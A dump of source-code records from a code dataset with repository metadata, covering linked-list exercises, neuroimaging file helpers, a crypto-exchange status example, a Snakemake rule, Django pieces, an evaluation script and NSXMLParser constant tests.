"gaoxingyu@example.com"
] | gaoxingyu@example.com |
27c1879ef95a03504331c3ea5097c25188272733 | cb58043d5470c3d54807f09a51a7592a5760b0d1 | /LinkedList/05-sum-lists-my.py | 776b4fded8a2cf8ed4e1393062fd2ef0db276dff | [] | no_license | Early-woods/Python_Coding_Practice | 11a5f8fb777ed7945cb76642eab21aa014af8463 | 5dd9ff2e131130f164605e88f5962c2b41e7513f | refs/heads/master | 2021-05-24T09:28:13.282045 | 2020-04-05T06:35:56 | 2020-04-05T06:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | """
# Sum two numbers that are represented with linked lists with decimal digits
# in reverse order of magnitude.
num1 = Node(1,Node(2,Node(3)))
num2 = Node(4,Node(9,Node(5)))
self.assertEqual(str(sum_lists(num1, num2)), "5,1,9")
"""
class Node:
def __init__(self, val, next=None):
self.val = val
self.next = next
def operate(a, b):
runner = Node(0)
head = runner
carry = 0
while a and b:
s = a.val + b.val + carry
carry = 1 if s>10 else 0
n = Node(s%10)
runner.next = n
runner = runner.next
a = a.next
b = b.next
if a and not b:
n = Node(0)
b = n
elif b and not a:
n = Node(0)
a = n
if carry:
n = Node(carry)
runner.next = n
return head.next
# a = Node(9,Node(2,Node(3, Node(4, Node(1)))))
a = Node(1,Node(2,Node(3)))
b = Node(4,Node(9,Node(5)))
head = operate(a, b)
while head:
print(head.val)
head = head.next
| [
"nidhi.bhushan123@gmail.com"
] | nidhi.bhushan123@gmail.com |
972c57aa4aab0906af4b69747461b1d1f4e9cb1d | 9c9b4759bb952c2b42b1fd0ed2a469eb8ad191bd | /neuro_pypes/utils/files.py | 2acca4f41a8cbb2f33d86181fcb126def8cc7ce1 | [
"Apache-2.0"
] | permissive | zuxfoucault/pypes | 1dfaa73ae722e001fc58639d32f6b2e435cd4504 | e88d27ebba842e8fa1f36b52ca12a0b9d5777e89 | refs/heads/master | 2020-06-20T13:04:11.541657 | 2018-10-23T09:27:53 | 2018-10-23T09:27:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,753 | py | # -*- coding: utf-8 -*-
"""
Helper functions to manage external files.
"""
import re
import os
from glob import glob
from functools import wraps
def get_vox_dims(volume):
    """Return the voxel dimensions (x, y, z) of *volume* as a list of floats.

    *volume* may be a path to a NIfTI file or a list of such paths, in which
    case only the first entry is inspected.
    """
    import nibabel as nb
    img_path = volume[0] if isinstance(volume, list) else volume
    zooms = nb.load(img_path).header.get_zooms()
    return [float(zooms[i]) for i in range(3)]
def get_data_dims(volume):
    """Return the array dimensions (x, y, z) of *volume* as a list of ints.

    *volume* may be a path to a NIfTI file or a list of such paths, in which
    case only the first entry is inspected.
    """
    import nibabel as nb
    img_path = volume[0] if isinstance(volume, list) else volume
    shape = nb.load(img_path).header.get_data_shape()
    return [int(shape[i]) for i in range(3)]
def get_affine(volume):
    """Return the affine transform matrix of the NIfTI image at path *volume*."""
    import nibabel as nb
    return nb.load(volume).affine
def niftiimg_out(f):
    """Decorator for a function whose first argument is an img (or a sequence
    of imgs) and whose return value is a numpy array.

    The wrapped function returns that array packed into a
    ``nibabel.Nifti1Image`` carrying the affine and header of the (first)
    input image.
    """
    import nibabel as nib
    import nilearn.image as niimg

    @wraps(f)
    def wrapped(*args, **kwargs):
        r = f(*args, **kwargs)
        img = niimg.load_img(args[0])
        # `get_affine()` was deprecated in nibabel 2.1 and removed in 3.0;
        # the `affine` attribute is the supported accessor.
        return nib.Nifti1Image(r, affine=img.affine, header=img.header)
    return wrapped
def get_extension(filepath, check_if_exists=False, allowed_exts=None):
    """Return the extension of *filepath*, honouring compound extensions.

    Parameters
    ----------
    filepath: str
        File name or path.
    check_if_exists: bool
        Unused; kept for backward compatibility with existing callers.
    allowed_exts: dict
        Maps the last part of a compound ('.' separated) extension to the
        part that may precede it, e.g. ``{'.gz': '.nii'}`` so that
        ``'.nii.gz'`` is reported as a single extension.
        Default: ``{'.gz': '.nii'}``.

    Returns
    -------
    ext: str
        The extension of the file name or path.
    """
    if allowed_exts is None:
        allowed_exts = {'.gz': '.nii'}

    stem, ext = os.path.splitext(filepath)
    prev_parts = allowed_exts.get(ext)
    if prev_parts is not None:
        _, prev_ext = os.path.splitext(stem)
        if prev_ext in prev_parts:
            ext = prev_ext + ext
    return ext
def add_extension_if_needed(filepath, ext):
    """Append *ext* to *filepath* unless it already ends with it.

    Parameters
    ----------
    filepath: str
        File name or path.
    ext: str
        File extension.

    Returns
    -------
    filepath: str
        File name or path with the extension appended, if it was missing.
    """
    if filepath.endswith(ext):
        return filepath
    return filepath + ext
def remove_ext(filepath):
    """Return *filepath* with its (possibly compound, e.g. ``.nii.gz``)
    extension stripped.

    Parameters
    ----------
    filepath: str
        File path or name.

    Returns
    -------
    filepath: str
        File path or name without extension.
    """
    ext = get_extension(filepath)
    return filepath[:filepath.rindex(ext)]
def extension_duplicates(regexp_pair_list):
    """Return a new list with the pairs of `regexp_pair_list` whose first
    item ends in '.nii$', with every '.nii' replaced by '.nii.gz'.

    This is useful for the Datasink regexp_substitutions when you don't
    know/care what extension the output image will have: declare the pair
    for the '.nii' case, e.g.
    ``(r"/rc1[\w]+_corrected\.nii$", "/coreg_gm.nii")``,
    then call this function to obtain the matching '.nii.gz' variants.

    Parameters
    ----------
    regexp_pair_list: list of 2-tuple of str

    Returns
    -------
    mod_regexp_pair_list: list of 2-tuple of str
    """
    def _gz_variant(text):
        return text.replace('.nii', '.nii.gz')

    return [(_gz_variant(src), _gz_variant(dst))
            for src, dst in regexp_pair_list
            if '.nii$' in src]
def rename(in_files, suffix=None):
    """Return the paths in `in_files` with `suffix` appended to each base
    name, keeping every file's directory and extension.

    When `suffix` is None, a zero-padded index ('_000', '_001', ...) is used
    instead.
    """
    import os.path as op
    from nipype.utils.filemanip import (
        filename_to_list,
        split_filename,
        list_to_filename
    )

    renamed = []
    for index, fpath in enumerate(filename_to_list(in_files)):
        dirname, stem, ext = split_filename(fpath)
        tag = ('_%03d' % index) if suffix is None else suffix
        renamed.append(op.join(dirname, stem + tag + ext))
    return list_to_filename(renamed)
def find_files_in(dirpath, file_pattern, pat_type='fnmatch'):
    """Find files in `dirpath` without recursing into subdirectories.

    Parameters
    ----------
    dirpath: str
        Folder where to search for file names.

    file_pattern: str
        File pattern to be matched.

    pat_type: str
        The type of pattern in `file_pattern`.
        Choices: 'fnmatch', 're.search', 're.match'.

    Returns
    -------
    files: List[str]
        Paths of the files that match `file_pattern`; each item includes
        `dirpath`.
    """
    if pat_type == 'fnmatch':
        return glob(os.path.join(dirpath, file_pattern))

    if pat_type not in ('re.search', 're.match'):
        raise ValueError("Expected one of ('fnmatch', 're.search' or 're.match') for "
                         "`pat_type` parameter, got {}.".format(pat_type))

    # Regex modes: list every entry, then filter with the compiled pattern.
    pattern = re.compile(file_pattern)
    test = pattern.search if pat_type == 're.search' else pattern.match
    return [entry for entry in glob(os.path.join(dirpath, '*')) if test(entry)]
def fetch_one_file(dirpath, file_pattern, file_extension=None, extra_prefix=None,
                   extra_suffix=None, pat_type='fnmatch'):
    """Return the unique file path in `dirpath` that matches `file_pattern`.

    If more than one file matches, `extra_prefix`/`extra_suffix` are added to
    the pattern and the search is retried once.

    Parameters
    ----------
    dirpath: str
        Folder to search in.

    file_pattern: str
        File pattern to be matched (without the extension).

    file_extension: str
        Extension of the file, appended verbatim to `file_pattern` before
        searching. NOTE(review): with the regex `pat_type`s the extension is
        concatenated as-is, so any '.' in it is a regex wildcard — callers
        should escape it if that matters.

    extra_prefix: str

    extra_suffix: str

    pat_type: str
        The type of pattern in `file_pattern`.
        Choices: 'fnmatch', 're.search', 're.match'.

    Returns
    -------
    file_path: str
        The path to the unique file that matches the conditions inside
        `dirpath`; `dirpath` is included.

    Raises
    ------
    IOError
        If `dirpath` doesn't exist, no file matches, or the match is not
        unique even after retrying with the extra prefix/suffix.

    ValueError
        If the choice for `pat_type` is not valid.
    """
    if file_extension is not None:
        file_fnmatch = file_pattern + file_extension
    else:
        file_fnmatch = file_pattern

    # Bug fix: search with the extension-qualified pattern. Previously the
    # bare `file_pattern` was passed here, so `file_extension` only appeared
    # in error messages and never actually constrained the search.
    files = find_files_in(dirpath, file_fnmatch, pat_type=pat_type)
    if not files:
        raise IOError('Expected at least one file that matched the '
                      'pattern {} in {}.'.format(file_fnmatch, dirpath))

    if len(files) > 1:
        if extra_prefix is None:
            extra_prefix = ''
        if extra_suffix is None:
            extra_suffix = ''

        if not extra_prefix and not extra_suffix:
            raise IOError('Found more than one file that matched the '
                          'pattern {} in {}: {}'.format(file_fnmatch, dirpath, files))
        else:
            # TODO: be careful, this might only work with fnmatch
            return fetch_one_file(dirpath, extra_prefix + file_pattern + extra_suffix,
                                  file_extension=file_extension,
                                  pat_type=pat_type)

    return files[0]
def save_object(obj, filename):
    """Pickle `obj` into the file `filename` using the highest protocol."""
    import pickle

    with open(filename, 'wb') as output_file:
        pickle.dump(obj, output_file, pickle.HIGHEST_PROTOCOL)
| [
"alexsavio@gmail.com"
] | alexsavio@gmail.com |
091ea0c55edb020988dfe03cb4fc99470836eeba | d52ea2ddba48e3c9e69f16e2e671002cb8a55c9d | /example/generic/get_system_status.py | 7f315dbc0fb55f74fc3abc1dcb9b374e5dd9a388 | [
"Apache-2.0"
] | permissive | GreatWei/huobi_Python | 3bf8583d5ef042099d9f2a2a2cedfaba1b5f03bb | 7ed1cccedd2aadc61716292300bd5ba3d1d45f9f | refs/heads/master | 2023-05-01T00:39:10.497133 | 2021-05-07T16:20:32 | 2021-05-07T16:20:32 | 312,221,461 | 0 | 0 | Apache-2.0 | 2021-03-07T16:30:43 | 2020-11-12T09:03:01 | Python | UTF-8 | Python | false | false | 219 | py | from huobi.client.generic import GenericClient
"""
GET https://status.huobigroup.com/api/v2/summary.json
"""
# Example script: query Huobi's public system-status endpoint (no API key
# required) through the generic client and print the parsed response.
generic_client = GenericClient()
system_status = generic_client.get_system_status()
print(system_status)
| [
"devin0thinking@gmail.com"
] | devin0thinking@gmail.com |
8c39453a9b9e2ca5f055a0f3eb096d876a41a678 | 2da798f1b31c6482d8f47bce394d78ccfae9d279 | /raw_data_processing/GSE149069/SRS6514323/rules/secondary_analysis.smk | aa67208cf2937ffcf7478fd4828e3af2350c3375 | [] | no_license | mariafiruleva/sc_athero_itmo_master | 47378083201e0dbad327b98291bbf4e65d5d3cc5 | e3c8c1b55d61b551957da13d109c8dfb56aa3173 | refs/heads/main | 2023-05-20T11:49:23.202549 | 2021-06-07T16:26:15 | 2021-06-07T16:26:15 | 373,524,898 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | smk | rule run_analysis:
"""
Run Seurat processing using count matrix from the get_count_matrix rule.
"""
input: rules.get_count_matrix.output.count_mat
benchmark: "benchmarks/analysis.txt"
log: "logs/seurat.log"
output: h5ad=temp(f"{sample_id}.h5ad"), rda=f"{sample_id}.RData"
conda: "/mnt/tank/scratch/mfiruleva/scn/config/65ef9760.yaml"
shell: "Rscript scripts/analysis.R 2> {log}" | [
"mmfiruleva@gmail.com"
] | mmfiruleva@gmail.com |
3e51589882d154b4609ce603544d030222ba4c73 | 40bf8016b86d3869dbc694f12f99a8b4103ae41a | /eval_GCR_ri.py | 085e9e8e9656a2c433ca1f3345e9a8e616711470 | [] | no_license | lwj2018/islr-few-shot | 3bc8e71fca3bfa07ec57c01cac095587494a010b | 4ff900662ba16b402f6ccda032d022f527873c1a | refs/heads/master | 2021-05-26T09:03:05.235782 | 2020-06-10T06:59:17 | 2020-06-10T06:59:17 | 254,068,609 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,132 | py | import os.path as osp
import time
import numpy as np
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from models.GCR_ri import GCR_ri
from models.gcrHCN_origin import gcrHCN
from models.Hallucinator import Hallucinator
from utils.ioUtils import *
from utils.critUtils import loss_for_gcr, loss_for_gcr_relation
from utils.trainUtils import train_gcr_relation
from utils.testUtils import eval_gcr_relation
from torch.utils.tensorboard import SummaryWriter
from utils.dataUtils import getValloader
from Arguments import Arguments

# Evaluation script for the GCR-relation few-shot sign-language model:
# loads a pretrained checkpoint and runs one evaluation pass on the
# validation loader, logging to TensorBoard.
# NOTE(review): `os` is not imported here explicitly — presumably it comes in
# via `from utils.ioUtils import *`; verify.

# Hyper params
epochs = 2000
learning_rate = 1e-3
# Options
shot = 1
dataset = 'isl'
# Get args
args = Arguments(shot,dataset)
# Names used for the TensorBoard run directory and checkpoint bookkeeping.
store_name = 'eval_' + dataset + '_GCR_ri' + '_%dshot'%(args.shot)
summary_name = 'runs/' + store_name
# NOTE(review): `shot` is 1 above but the checkpoint file is the 5-shot one —
# confirm this mismatch is intentional.
checkpoint = '/home/liweijie/projects/islr-few-shot/checkpoint/isl_GCR_ri_5shot_best.pth.tar'
log_interval = 20
device_list = '0'
model_path = "./checkpoint"
start_epoch = 0
best_acc = 0.00
# Use specific gpus
os.environ["CUDA_VISIBLE_DEVICES"]=device_list
# Device setting
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Use writer to record; each run gets a timestamped subdirectory.
writer = SummaryWriter(os.path.join(summary_name, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))))
# Prepare dataset & dataloader
val_loader = getValloader(dataset,args)

# Backbone CNN feeding the GCR relation head.
model_cnn = gcrHCN().to(device)
# model_gen = Hallucinator(args.feature_dim).to(device)
model = GCR_ri(model_cnn,train_way=args.train_way,\
    test_way=args.test_way, shot=args.shot,query=args.query,query_val=args.query_val,f_dim=args.feature_dim).to(device)

# Resume model (restores weights; returns the epoch and best accuracy so far)
if checkpoint is not None:
    start_epoch, best_acc = resume_gcr_model(model, checkpoint, args.n_base)

# Create loss criterion & optimizer
criterion = loss_for_gcr_relation()

# Start Evaluation (a single pass: the range covers exactly one epoch)
print("Evaluation Started".center(60, '#'))
for epoch in range(start_epoch, start_epoch+1):
    # Eval the model
    acc,_ = eval_gcr_relation(model,criterion,val_loader,device,epoch,log_interval,writer,args)
    print('Batch acc on isl: {:.3f}'.format(acc))

print("Evaluation Finished".center(60, '#'))
"lwj19970331@gmail.com"
] | lwj19970331@gmail.com |
b8af9e711e28d5820cf856417659f62244951f7c | b739fefa06d46a60fe053f7fe0fe2c62a52242b2 | /constants/object_types.py | 115042d2d8836f8dcc2515a5fac8eb3ecab694b1 | [] | no_license | icorso/gkr-web-tests | c59d3b0f7e371e887c6699cd09b6a87a71dd762e | fdf25ad700d75230f1af74b646a6a8a18f3d0b18 | refs/heads/master | 2021-01-13T05:15:37.913759 | 2017-02-08T07:44:04 | 2017-02-08T07:44:04 | 81,296,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | # coding=utf-8
from enum import Enum
class ObjectTypes(Enum):
    """Real-estate object types, each carrying a human-readable (Russian)
    label and a numeric id alongside the member's value tuple."""

    STROI_OBJECT = ('Объект капитального строительства', 1)
    ZEM_UCHASTOK = ('Земельный участок', 2)
    DOMOVLADENIE = ('Домовладение', 3)
    ZEMLI_SH_NAZNACHENIYA = ('Земли сельхоз назначения', 4)

    def __init__(self, name, id_):
        # NOTE(review): assigning `self.name` only works because the plain
        # `name`/`id` methods below shadow Enum's `name` descriptor with a
        # non-data descriptor, letting the instance attribute win. This is
        # fragile across Python/enum versions — confirm before upgrading.
        self.name = name
        self.id = id_

    def __repr__(self):
        return "<ObjectType (name='%s', id='%s')>" \
            % (self.name, self.id)

    def __str__(self):
        return self.name

    # The two methods below exist to shadow Enum's built-in `name` descriptor
    # (and mirror it for `id`); the instance attributes set in __init__ take
    # precedence, so these bodies are effectively never executed.
    def name(self):
        return self.name

    def id(self):
        return self.id
| [
"icorso@yandex.ru"
] | icorso@yandex.ru |
ed931e86f479edeb22c132706c3247b57f07bbe1 | bd08d0532f20b7285b437c9bf620de1bbcd5b9ea | /aalh_iit_industry_001/debug-find-duplicates.py | 50978835bcfc71ce41df7112a37c6f6c58eed258 | [
"Unlicense"
] | permissive | johndewees/iitmigration | a9e8a31ba6ceb541ce12c22fd612596cc243dbca | 4dadfbecda719d6e7d60af076a231aedec3c862f | refs/heads/main | 2023-03-14T17:06:58.777683 | 2021-03-27T20:44:58 | 2021-03-27T20:44:58 | 320,086,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | from openpyxl import load_workbook
# Scan the metadata spreadsheet for duplicate file names (column 43) and
# duplicate identifiers (column 25) across rows 7-474, printing any value
# that occurs more than once.
filename = 'aalh_iit_industry_001.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']

# Worksheet layout constants.
minimumcol = 43
maximumcol = 43
minimumrow = 7
maximumrow = 474
iterationrow = 7
identifiercol = 25
filenamecol = 43

# Occurrence counts keyed by cell value.
countfilename = dict()
countidentifier = dict()

for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
    # The iterator only drives one pass per worksheet row (min_col == max_col
    # means a single cell per row); both columns are read directly by index.
    testvar1 = ws.cell(row=iterationrow, column=filenamecol).value
    countfilename[testvar1] = countfilename.get(testvar1, 0) + 1

    testvar2 = ws.cell(row=iterationrow, column=identifiercol).value
    # Bug fix: membership used to be tested against `countfilename`, which
    # left identifier counts stuck at 1 (and raised KeyErrors that a bare
    # `except: continue` silently swallowed), so duplicate identifiers were
    # never reported.
    countidentifier[testvar2] = countidentifier.get(testvar2, 0) + 1

    iterationrow = iterationrow + 1

for file1 in countfilename:
    if countfilename[file1] > 1:
        print('Duplicate File Name:',file1, countfilename[file1])

for file2 in countidentifier:
    if countidentifier[file2] > 1:
        print('Duplicate Identifier:',file2, countidentifier[file2])

print('*Duplicate Check Completed*')
#print(countfilename)
#print(countidentifier)
"noreply@github.com"
] | johndewees.noreply@github.com |
d5e10c4fcdfc66ab5ce65924e15fb38eeb866c66 | 3597ecf8a014dbd6f7d998ab59919a94aff8011d | /api-web/src/www/application/modules/treatment_block_pub_version/components.py | 750b0345de3b8f412e65119f3a59b7b45bfa4d32 | [] | no_license | duytran92-cse/nas-genomebrowser | f42b8ccbb7c5245bde4e52a0feed393f4b5f6bf1 | d0240ad5edc9cfa8e7f89db52090d7d733d2bb8a | refs/heads/master | 2022-10-24T05:26:01.760241 | 2020-06-14T19:01:35 | 2020-06-14T19:01:35 | 272,264,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 663 | py | from application.models import *
class TreatmentBlockPublicationVersionHelper(object):
    """Read helpers for publications linked to a treatment-block version."""

    def load_publications(self, id):
        """Return a list of dicts describing every publication attached to
        the treatment block version with primary key `id`; empty list when
        there are none."""
        records = TreatmentBlockPublication.objects.filter(treatment_block_version_id=id)
        return [
            {
                'id': record.id,
                'pmid': record.pmid,
                'doi': record.doi,
                'pmc': record.pmc,
                'title': record.title,
                'authors': record.authors,
                'journal': record.journal,
            }
            for record in records
        ]
"thanh.tran@etudiant.univ-lr.fr"
] | thanh.tran@etudiant.univ-lr.fr |
e73d3fd602f0549bdec2e9c66788186f234c4bf6 | 8682d6d60aa2f4c7a17300c2d935c45e972d00e2 | /media.py | ef29b6cb5b8a6e7dc52c5d1a09d99de6e03b1bcb | [] | no_license | coursepractice/movie-trailer-website | cf941f266ec154df5363e15b4916ee8efed6374f | 22ced122e3fddcb8f680727676519a0a648326d6 | refs/heads/master | 2021-01-10T13:14:15.478889 | 2015-06-04T22:31:23 | 2015-06-04T22:31:23 | 36,898,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | class Movie():
    # Constructor: stores the display data used by the trailer website.
    def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube):
        """Store the title, storyline, poster image URL and trailer URL."""
        self.title = movie_title
        self.storyline = movie_storyline
        self.poster_image_url = poster_image
        self.trailer_youtube_url = trailer_youtube
"root@ip-10-47-174-141.ec2.internal"
] | root@ip-10-47-174-141.ec2.internal |
a9bfe1e818e4c241e4e168f26f9386e2173e1dfe | 38466811d0e12a8f755bae58d7244622ef5f4d9b | /problems_analysis/min_depth_bin_tree.py | 4570a069796dcb336a243373d87b121fb64c1f80 | [] | no_license | andysitu/algo-problems | 4ab5a2b6591f0c0d84174b69598f30bc354ff8aa | 35c88dc747e7afa4fdd51d538bc80c4712eb1172 | refs/heads/master | 2023-06-24T15:55:39.019652 | 2021-02-26T20:31:07 | 2021-02-26T20:31:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | """
Similar to the max depth bin tree except you are taking
the minimum instead of the max. If you find the depth of
the left child, then you can start the calculation of the
right child if it exceeds that min depth or vice versa.
This would require the recursive approach.
Runtime O(n) ; Space O(n)/O(1) depending on how recursion is seen
"""
"""
Another approach is to only explore the node with the min depth.
This way, as soon as you approach the first leaf node, it would be
the minimal height. A queue would work with a fifo approach while
If it's a balanced tree, then you would have to approach all the nodes,
but any approach would have to do so anyway if you want to explore
the entirety of the nodes and ensure correctness.
""" | [
"and.situ@gmail.com"
] | and.situ@gmail.com |
d8044123f06fe27910f39c49e03d3f92e4d67acb | 90bf2ffa7ee75ff266238bffd1b3edc6f83a2bbe | /WebApp_DataSupport/TSA_person_database/step1_createdb.py | de66e7b554beeff8bacd9e2701981525a69c284d | [] | no_license | MacHu-GWU/EFA-finished-projects | f7cf5e0f765aba78db2c1dd8729accff443aa6ee | 88c93b0e1c5880b710c11ef93254a732573c92ee | refs/heads/master | 2021-03-13T00:11:15.580259 | 2014-10-06T15:20:15 | 2014-10-06T15:20:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | ##coding=utf8
import faker
import sqlite3
from _tool_schema import get_schema
# Create the `person` table of the TSA mock database (Python 2 script:
# note the statement-form prints below).
conn = sqlite3.connect(r'C:\Users\Sanhe.Hu\Data_warehouse\TSA\TSA_person.db')
c = conn.cursor()

''' CREATE TABLE '''
try:
    # Schema: identity fields, several watch-list / screening flag columns
    # (INTEGER used as booleans), and the scoring columns.
    cmd = \
    """
    CREATE TABLE person
    (id INTEGER PRIMARY KEY NOT NULL,
    lastname TEXT,
    firstname TEXT,
    social_network TEXT,
    International_Terrorist_Watch_List INTEGER,
    National_Terrorist_Watch_List INTEGER,
    National_Law_Enforcement INTEGER,
    Local_Law_Enforcement INTEGER,
    IRS_or_other_Federal_Finance_Company INTEGER,
    Face_Match_with_Picture_DB INTEGER,
    Cash_Payment_Same_Day INTEGER,
    Immediate_Family INTEGER,
    Extented_Family INTEGER,
    Place_of_Worship INTEGER,
    basic_score REAL,
    bonus_score REAL,
    score INTEGER)
    """
    c.execute(cmd)
    conn.commit()
    conn.close()
except:
    # NOTE(review): bare except — this also hides real errors (e.g. a locked
    # database), not just "table already exists"; consider narrowing.
    print 'cannot create table!'

# Re-open through the schema helper and print the table layout as a check.
db = get_schema(r'C:\Users\Sanhe.Hu\Data_warehouse\TSA\TSA_person.db')
print db
print db.person
"husanhe@gmail.com"
] | husanhe@gmail.com |
25650425821f60b09b90d551b0bb2a43248b7953 | b1ea051f9192e5fef2ca724a72c287214fcacf15 | /payment/migrations/0002_auto_20190223_1212.py | 6d8110a08b1642ec49868bca3ab5336b96755ccd | [] | no_license | pacifi/rest-bank | 8fbab44eff770db25beb5a9093ac95e608ec3131 | 90c5eebcf901a3ada09f094e49e50e23a0363422 | refs/heads/master | 2020-04-20T00:11:23.555974 | 2019-02-26T04:10:33 | 2019-02-26T04:10:33 | 168,516,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | # Generated by Django 2.1.7 on 2019-02-23 17:12
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('payment', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='payment',
name='id',
field=models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True),
),
]
| [
"pacifi.bnr@gmail.com"
] | pacifi.bnr@gmail.com |
93d29e65d3fbdd674ff739f14fe376821b95c1c0 | b78ef082335b0a901b3f028746055fc6308990a2 | /Algorithms/Leetcode/430 - Flatten a Multilevel Doubly Linked List.py | 8982138ae41e53b53bbc68d2e999a350da4c9afc | [] | no_license | timpark0807/self-taught-swe | 1a968eab63f73cea30ef2379ffab53980743ed1a | bbfee57ae89d23cd4f4132fbb62d8931ea654a0e | refs/heads/master | 2021-08-14T23:31:14.409480 | 2021-08-10T06:36:06 | 2021-08-10T06:36:06 | 192,797,733 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 875 | py | """
# Definition for a Node.
class Node(object):
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution(object):
    def flatten(self, head):
        """Flatten a multilevel doubly linked list depth-first, splicing each
        child list in front of the node's `next` list and clearing the
        `child` pointers.

        :type head: Node
        :rtype: Node
        """
        if not head:
            return head

        pending = [head]    # explicit DFS stack: child is pushed last, so
                            # it is spliced in before the `next` chain
        tail = None         # last node stitched into the flattened list
        while pending:
            node = pending.pop()
            if tail is not None:
                tail.next = node
                node.prev = tail
            if node.next:
                pending.append(node.next)
            if node.child:
                pending.append(node.child)
                node.child = None
            tail = node
        return head
| [
"timpark0807@gmail.com"
] | timpark0807@gmail.com |
3ed274764dddc44f7d777343c021925a74e26725 | fdcc67ab28dccb89b69dc647eb996bd7acfcd791 | /themusic/wsgi.py | a82c793dbe6afd976dd791570e69391e231168b0 | [] | no_license | moses-mugoya/Personal-Music-Upload-System | daaffada181067a99fe7d484f132f72c0bcace25 | b3a03e714c792968d9e83b2c9a57cc13de00aeca | refs/heads/master | 2021-07-15T06:00:49.679448 | 2017-10-20T20:39:14 | 2017-10-20T20:39:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for themusic project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "themusic.settings")
application = get_wsgi_application()
| [
"mosesmugoya31@gmail.com"
] | mosesmugoya31@gmail.com |
205539d4394c8835228d7e3e7d8bdb50cfde214c | b76615ff745c6d66803506251c3d4109faf50802 | /pyobjc-framework-Cocoa/PyObjCTest/test_nsxmlparser.py | b4e8b4cc6cbd578b852147807948fc93a25ac26a | [
"MIT"
] | permissive | danchr/pyobjc-git | 6ef17e472f54251e283a0801ce29e9eff9c20ac0 | 62b787fddeb381184043c7ff136f1c480755ab69 | refs/heads/master | 2021-01-04T12:24:31.581750 | 2020-02-02T20:43:02 | 2020-02-02T20:43:02 | 240,537,392 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,270 | py | from Foundation import *
from PyObjCTools.TestSupport import *
class TestNSXMLParser(TestCase):
    """Tests for the Cocoa NSXMLParser bindings exposed by PyObjC."""

    def testConstants(self):
        """Every NSXMLParser constant must equal its Cocoa-defined value."""
        # NSXMLParserError codes (reported in NSXMLParserErrorDomain).
        self.assertEqual(NSXMLParserInternalError, 1)
        self.assertEqual(NSXMLParserOutOfMemoryError, 2)
        self.assertEqual(NSXMLParserDocumentStartError, 3)
        self.assertEqual(NSXMLParserEmptyDocumentError, 4)
        self.assertEqual(NSXMLParserPrematureDocumentEndError, 5)
        self.assertEqual(NSXMLParserInvalidHexCharacterRefError, 6)
        self.assertEqual(NSXMLParserInvalidDecimalCharacterRefError, 7)
        self.assertEqual(NSXMLParserInvalidCharacterRefError, 8)
        self.assertEqual(NSXMLParserInvalidCharacterError, 9)
        self.assertEqual(NSXMLParserCharacterRefAtEOFError, 10)
        self.assertEqual(NSXMLParserCharacterRefInPrologError, 11)
        self.assertEqual(NSXMLParserCharacterRefInEpilogError, 12)
        self.assertEqual(NSXMLParserCharacterRefInDTDError, 13)
        self.assertEqual(NSXMLParserEntityRefAtEOFError, 14)
        self.assertEqual(NSXMLParserEntityRefInPrologError, 15)
        self.assertEqual(NSXMLParserEntityRefInEpilogError, 16)
        self.assertEqual(NSXMLParserEntityRefInDTDError, 17)
        self.assertEqual(NSXMLParserParsedEntityRefAtEOFError, 18)
        self.assertEqual(NSXMLParserParsedEntityRefInPrologError, 19)
        self.assertEqual(NSXMLParserParsedEntityRefInEpilogError, 20)
        self.assertEqual(NSXMLParserParsedEntityRefInInternalSubsetError, 21)
        self.assertEqual(NSXMLParserEntityReferenceWithoutNameError, 22)
        self.assertEqual(NSXMLParserEntityReferenceMissingSemiError, 23)
        self.assertEqual(NSXMLParserParsedEntityRefNoNameError, 24)
        self.assertEqual(NSXMLParserParsedEntityRefMissingSemiError, 25)
        self.assertEqual(NSXMLParserUndeclaredEntityError, 26)
        self.assertEqual(NSXMLParserUnparsedEntityError, 28)
        self.assertEqual(NSXMLParserEntityIsExternalError, 29)
        self.assertEqual(NSXMLParserEntityIsParameterError, 30)
        self.assertEqual(NSXMLParserUnknownEncodingError, 31)
        self.assertEqual(NSXMLParserEncodingNotSupportedError, 32)
        self.assertEqual(NSXMLParserStringNotStartedError, 33)
        self.assertEqual(NSXMLParserStringNotClosedError, 34)
        self.assertEqual(NSXMLParserNamespaceDeclarationError, 35)
        self.assertEqual(NSXMLParserEntityNotStartedError, 36)
        self.assertEqual(NSXMLParserEntityNotFinishedError, 37)
        self.assertEqual(NSXMLParserLessThanSymbolInAttributeError, 38)
        self.assertEqual(NSXMLParserAttributeNotStartedError, 39)
        self.assertEqual(NSXMLParserAttributeNotFinishedError, 40)
        self.assertEqual(NSXMLParserAttributeHasNoValueError, 41)
        self.assertEqual(NSXMLParserAttributeRedefinedError, 42)
        self.assertEqual(NSXMLParserLiteralNotStartedError, 43)
        self.assertEqual(NSXMLParserLiteralNotFinishedError, 44)
